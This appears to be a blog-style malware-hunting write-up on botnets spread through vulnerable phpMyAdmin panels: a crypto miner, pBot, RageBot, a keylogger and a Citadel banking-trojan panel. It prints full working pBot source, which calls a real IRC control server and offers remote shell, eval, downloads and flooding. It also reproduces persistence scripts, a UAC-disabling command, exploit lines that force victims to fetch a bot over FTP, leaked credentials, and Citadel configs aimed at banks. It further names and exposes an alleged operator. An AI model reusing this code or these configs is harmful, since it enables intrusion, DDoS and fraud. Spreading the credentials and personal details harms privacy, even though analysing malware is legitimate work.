Miner Spreading over Zmeu

Infected machine cpu at 100% , bin execution dir was C:\appserv\phpmyadmin\ , following the logs it got infected throu that pma exploit


init.exe - SFX archive that calls another SFX arch called sys,exe

sys.exe

run.bat

@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end

geox..exe

run.bat - sets mode hiden on folder's

@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
START attrib +H +S %SystemRoot%\init

reg.reg / sets itself at startup services
 

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

bash.lnk - also stars miner whith following command , host , user and pass

%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"

init.exe - miner exe also a help command on it .



VirusTotal  - Malwr

pBot - 167.114.128.120 - IRC

LOL




He uses zmeu scanner and pma exploit to spread a php botnet !
here is bot script

<?php
set_time_limit(0); 
error_reporting(0);
ignore_user_abort(true);

$dir = getcwd();
$uname= @php_uname();

function whereistmP()
{
        $uploadtmp=ini_get('upload_tmp_dir');
        $uf=getenv('USERPROFILE');
        $af=getenv('ALLUSERSPROFILE');
        $se=ini_get('session.save_path');
        $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
        if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
        if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
        if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
        if(is_dir($uf) && is_writable($uf))return $uf;
        if(is_dir($af) && is_writable($af))return $af;
        if(is_dir($se) && is_writable($se))return $se;
        if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
        if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
        return '.';        
}
function srvshelL($command)
{
        $name=whereistmP()."\\".uniqid('NJ');
        $n=uniqid('NJ');
        $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
        win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
        win32_start_service($n);
        win32_stop_service($n);
        win32_delete_service($n);
        while(!file_exists($name))sleep(1);
        $exec=file_get_contents($name);
        unlink($name);
        return $exec;
}
function ffishelL($command)
{
        $name=whereistmP()."\\".uniqid('NJ');
        $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
        $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
        while(!file_exists($name))sleep(1);
        $exec=file_get_contents($name);
        unlink($name);
        return $exec;
}
function comshelL($command,$ws)
{
        $exec=$ws->exec("cmd.exe /c $command");
        $so=$exec->StdOut();
        return $so->ReadAll();
}
function perlshelL($command)
{
        $perl=new perl();
        ob_start();
        $perl->eval("system(\"$command\")");
        $exec=ob_get_contents();
        ob_end_clean();
        return $exec;
}
function Exe($command)
{
        $exec=$output='';
        $dep[]=array('pipe','r');$dep[]=array('pipe','w');
        if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
        elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
        elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
        elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
        elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
        elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
        elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
        elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
        elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
        elseif(extension_loaded('perl'))$exec=perlshelL($command);
        return $exec;
}

class pBot
{
 var $config = array("server"=>"167.114.128.120", "port"=>"6668","key"=>"","prefix"=>"", "maxrand"=>"5", "chan"=>"#Boxes","trigger"=>".","hostauth"=>"god.net"); 
 var $users = array(); 
 function start()
 {
    while(true)
 {
     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); 
     $ident = $this->config['prefix'];
     $alph = range("0","9");
     for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
     $this->set_nick();
     $this->main();
 }
}
 function main()
 {
    while(!feof($this->conn))
    {
 if(function_exists('stream_select'))
 {
 $read = array($this->conn);
 $write = NULL;
 $except = NULL;
 $changed = stream_select($read, $write, $except, 30);
 if($changed == 0)
 {
  fwrite($this->conn, "PING :lelcomeatme\r\n");
  $read = array($this->conn);
         $write = NULL;
         $except = NULL;
         $changed = stream_select($read, $write, $except, 30);
  if($changed == 0) break;
 }
 }
       $this->buf = trim(fgets($this->conn,512)); 
       $cmd = explode(" ",$this->buf); 
       if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
       if(isset($cmd[1]) && $cmd[1] =="001") { $this->join($this->config['chan'],$this->config['key']); continue; } 
       if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); continue; }
       if($this->buf != $old_buf) 
       { 
          $mcmd = array(); 
          $msg = substr(strstr($this->buf," :"),2); 
          $msgcmd = explode(" ",$msg); 
          $nick = explode("!",$cmd[0]); 
          $vhost = explode("@",$nick[1]); 
          $vhost = $vhost[1]; 
          $nick = substr($nick[0],1); 
          $host = $cmd[0]; 
          if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
          else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];

          if(count($cmd)>2) 
          { 
             switch($cmd[1]) 
             {
                case " ": 
                   if(true) 
                   {
                      if(substr($mcmd[0],0,1)==".") 
                      { 
                         switch(substr($mcmd[0],1)) 
                         {
                            case " ":
                               if(count($mcmd)>4) 
                               { 
                                  $header = "From: <".$mcmd[2].">"; 
                                  if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2mail\2]: sent."); 
                                  } 
                               } 
                            break;
                            case "dns": 
                               if(isset($mcmd[1])) 
                               { 
                                  $ip = explode(".",$mcmd[1]); 
                                  if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); 
                                  } 
                               } 
                            break;
                            case " ":
                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
                               else { $safemode = "off"; }
                               $uname = php_uname();
                               $this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
                            break;
                            case " ": 
                               $this->set_nick(); 
                            break; 
                            case " ":
                               $this->send(strstr($msg,$mcmd[1])); 
                            break; 
                            case " ":
   
           ob_start();
                                eval(strstr($msg,$mcmd[1]));
           $exec=ob_get_contents();
    ob_end_clean();
                               $ret = explode("\n",$exec);
                               for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break;
                            case " ": 
                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               $exec = Exe($command); 
                               $ret = explode("\n",$exec);
                               for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break;
                            case " ": 
                               if(count($mcmd)>2) 
                               { 
                                  $this->config['server'] = $mcmd[1]; 
                                  $this->config['port'] = $mcmd[2]; 
                                  if(isset($mcmcd[3])) 
                                  { 
                                   $this->config['pass'] = $mcmd[3]; 
                                   $this->privmsg($this->config['chan'],"[\2update\2]: info updated ".$mcmd[1].":".$mcmd[2]." pass: ".$mcmd[3]); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2update\2]: switched server to ".$mcmd[1].":".$mcmd[2]); 
                                  }
      fclose($this->conn);    
                               } 
                            break; 
                            case " ": 
                               if(count($mcmd) > 2) 
                               { 
                                  if(!$fp = fopen($mcmd[2],"w")) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2download\2]: could not open output file."); 
                                  } 
                                  else 
                                  { 
                                     if(!$get = file($mcmd[1])) 
                                     { 
                                        $this->privmsg($this->config['chan'],"[\2download\2]: could not download \2".$mcmd[1]."\2"); 
                                     } 
                                     else 
                                     { 
                                        for($i=0;$i<=count($get);$i++) 
                                        { 
                                           fwrite($fp,$get[$i]); 
                                        } 
                                        $this->privmsg($this->config['chan'],"[\2download\2]: file \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
                                     } 
                                     fclose($fp); 
                                  } 
                               }
                               else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
                            break;
                            case "udpflood": 
                               if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } 
                            break; 
                            case "tcpconn": 
                               if(count($mcmd)>5) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); } 
                            break;
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       }
    } 
 } 
 function send($msg) { fwrite($this->conn,$msg."\r\n"); } 
 function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); } 
 function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
 function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
 function set_nick()
 {
    $this->nick = "";
    if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->nick .= "Linux|";
    else $this->nick .= "Linux|";
    if(isset($_SERVER['SERVER_SOFTWARE']))
    {
       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"nginx")) $this->nick .= ""; 
       else $this->nick .= ""; 
    }
    else
    {
       $this->nick .= "";
    }
    $this->nick .= $this->config['prefix']; 
    for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); 
    $this->send("NICK ".$this->nick);
 } 
  function udpflood($host,$port,$time,$packetsize) {
 $this->privmsg($this->config['chan'],""); 
 $packet = "";
 for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
 $end = time() + $time;
 $multitarget = false;
 if(strpos($host, ",") !== FALSE)
 {
  $multitarget = true;
  $host = explode(",", $host);
 }
 $i = 0;
 if($multitarget)
 {
  $fp = array();
  foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);

  $count = count($host);
  while(true)
  {
         fwrite($fp[$i % $count],$packet);
   fflush($fp[$i % $count]);
   if($i % 100 == 0)
   {
    if($end < time()) break;
   }
   $i++;
  }

         foreach($fp as $fpp) fclose($fpp);
 } else {
  $fp = fsockopen("udp://".$host,$port,$e,$s,5);
  while(true)
  {
         fwrite($fp,$packet);
   fflush($fp);
   if($i % 100 == 0)
   {
    if($end < time()) break;
   }
   $i++;
  }
         fclose($fp);
 }
 $env = $i * $packetsize;
 $env = $env / 1048576;
 $vel = $env / $time;
 $vel = round($vel);
 $env = round($env);
 $this->privmsg($this->config['chan'],"".$env."".$vel."");
}
 function tcpconn($host,$port,$time) 
 { 
    $this->privmsg($this->config['chan'],"[\2TcpConn Started!\2]"); 
    $end = time() + $time;
    $i = 0;
    while($end > time())
    {
 $fp = fsockopen($host, $port, $dummy, $dummy, 1);
 fclose($fp);
        $i++;
    }
    $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: sent ".$i." connections to $host:$port."); 
 }
} 
$bot = new pBot; 
$bot->start(); 
?>

ragebot - 61.236.93.74 - IRC

Server : 61.236.93.74 
// hxxp://whois.domaintools.com/61.236.93.74
Port : 6667/tcp  open irc Unreal ircd
Channels : #g0tme# , #pwned#
// traffic on that 
<< MODE raGe|iuxwTmMNJS :+iwG
>> JOIN #g0tme#
<< JOIN :#g0tme#
<< 332 raGe|iuxwTmMNJS #g0tme# :!xpl 94 1 222.x.x.x 3 1 222.x.x.x 3 1
<< 333 raGe|iuxwTmMNJS #g0tme# root 1422314449
>> PRIVMSG #g0tme# :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 222.x.x.x with 94 threads. (autorooting)
<< 404 raGe|iuxwTmMNJS #g0tme# :You must have a registered nick (+r) to talk on this channel (#g0tme#)
// run's under the process name system32dll.exe
// bot commands commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
// host auth md5 crypted 630e20d41ee020459be07f5e8b7810dc : root.edu
// delete and download command md5 crypted099af53f601532dbd31e0ea99ffdeb64 - deletefd456406745d816a45cae554c788e754 - download
// VNC brutefore used paswswords password
11111111
12345678
1234567
123456

Plain bin and a report serach malwr for : 81062eeec1984689b90fc38dc1bfcc6b

Keylogger - 77.221.130.21

Creates reports for ( processes , logged key, and url's ) and save's em into here :

Server : 77.221.130.21 Port : 21
USER z92681.
PASS MzG5k6N2n..
OPTS utf8 on..
PWD..CWD /lo/..
// user and pass
0K9dg2kQEl+THDzDsftcRA==
1.0.0.0
127.0.0.1 
3drRPuLbQmixloQTAAYA1g==
// start up 
.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

// Sample and a Malwr report serach : 3b56c66455c3b1a82bcd56da18df9c38

22k ZmEu Botnet

On my Honeypot found this connection , i was and IRC serv running on that server



Connting to that oort ... 


-Lets check security of his server !! oh



Also many connections on that port which IRC serv is running


Got his config and lets join irc ..


Many bots! 26k


/list

2 admin's IP addresses 

Now i checked some log's of the infected pc's and found thiss ...

also he is spreading over a script that seraches for weak or no pass mysql php panel's
and infect them also /panel/script/setup.php this is an tool which HF skidds uses
its called the ZmEu masscan later more on that .
Also 14.35.234.212 was his scanning / spreading server
let's see if that better secured ... lolz 

 you see its an perl script that attacks filtered ip addresses that have
phpmyadmin panel online or vulnarable | ps aux

so located his script /bin/.php/
i attach later a archive whith all his data
see all *.txt files are vuln phpmyadmin panel that can maybe exploited

cat all.pl 
http://pastebin.com/JZnMHGGE
i paste just this here 
my $url = $host;
my $ftp = "ftp://185.4.29.127/a/0.php";
my $len = length($ftp);
every exploited pc , is forced to download this file over ftp
cat 0.php
http://pastebin.com/g75MAgjz
its a php bot 
    "server" => "222.216.30.28",
    "port" => "3131",
    "key" => "*",
    "prefix" => "",
    "maxrand" => "8",
    "chan" => "#dd0s#",
    "trigger" => ".",
    "hostauth" => "root.edu"
there are some other file's
cat a.php 
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw

-All data will be attached soon as archive ..
More about pma bot Here

Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed

// config.php
$config = array (
  'mysql_host' => 'localhost',
  'mysql_user' => 'root',
  'mysql_pass' => 'qwerty23456@',
  'mysql_db' => 'tenna',
  'reports_path' => '_reports1190699691',
  'reports_to_db' => 1,
  'reports_to_fs' => 0,
  'reports_geoip' => 0,
  'jabber' => 
  array (
    'host' => '',
    'login' => '',
    'pass' => '',
    'port' => 5222,
  ),
  'reports_jn' => 0,
  'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
  ),
  'allowed_countries_enabled' => 0,
  'allowed_countries' => '',
  'botnet_timeout' => 1500,
  'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;

config.txt / from builder
entry "StaticConfig"
  botnet "CIT"
  timer_config 4 9
  timer_logs 3 6
  timer_stats 4 8
  timer_modules 1 4
  timer_autoupdate 8
  url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
  
  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  encryption_key "jzhbfgjdhbgjhddkjgskdj"
  report_software 1
  enable_luhn10_get 0
  enable_luhn10_post  1
  disable_antivirus 0
  use_module_video 1
  antiemulation_enable 0
  disable_httpgrabber 0
  use_module_ffcookie 1
end
entry "DynamicConfig"
  url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
  url_server "http://richyadams.zapto.org/xampp/link/gate.php"
  file_webinjects "injects.txt"
  url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
  entry "AdvancedConfigs"
    "http://richyadams.zapto.org/xampp/link/config.bin"
 "http://richyadams.zapto.org/xampp/link/config.bin"
  end
  entry "WebFilters"
    "#*wellsfargo.com/*"
    "@*payment.com/*"
    "!http://*.com/*.jpg"
  end
  entry HttpVipUrls
    "*facebook.com/*"
  end
  entry "WebDataFilters"
  end
  entry "WebFakes"
  end
  entry "CmdList"
    "hostname"
    "tasklist"
    "ipconfig /all"
 "netsh firewall set opmode disable"
  end
  entry "Keylogger"
    processes "bank.exe;java.exe"
    time 3
  end
  entry "Video"
    quality 1
    length 600
  end
end

Not many bots Richy ..

 // Here is the admin ip address !
41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"

He's location based on the ip
and here is a pic of him




luv ur pix too !!